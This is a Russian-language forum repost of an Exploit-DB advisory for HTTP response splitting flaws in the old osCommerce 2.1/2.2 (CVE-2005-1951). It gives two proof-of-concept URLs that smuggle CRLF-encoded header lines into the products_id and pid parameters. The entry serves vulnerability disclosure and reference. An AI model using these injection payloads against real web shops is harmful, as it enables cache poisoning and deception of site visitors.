Exploit osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25840
Проверка EDB
  1. Пройдено
Автор
GULFTECH SECURITY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-1951
Дата публикации
2005-06-17
Код:
source: https://www.securityfocus.com/bid/13979/info

osCommerce is prone to multiple HTTP response splitting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

A remote attacker may exploit any of these vulnerabilities to influence or misrepresent how Web content is served, cached or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust. 

http://www.example.com/index.php?action=buy_now&products_id=22%0d%0atest:%20poison%20headers!
http://www.example.com/index.php?action=cust_order&pid=2%0d%0atest:%20poison%20headers!
 
Источник
www.exploit-db.com

Похожие темы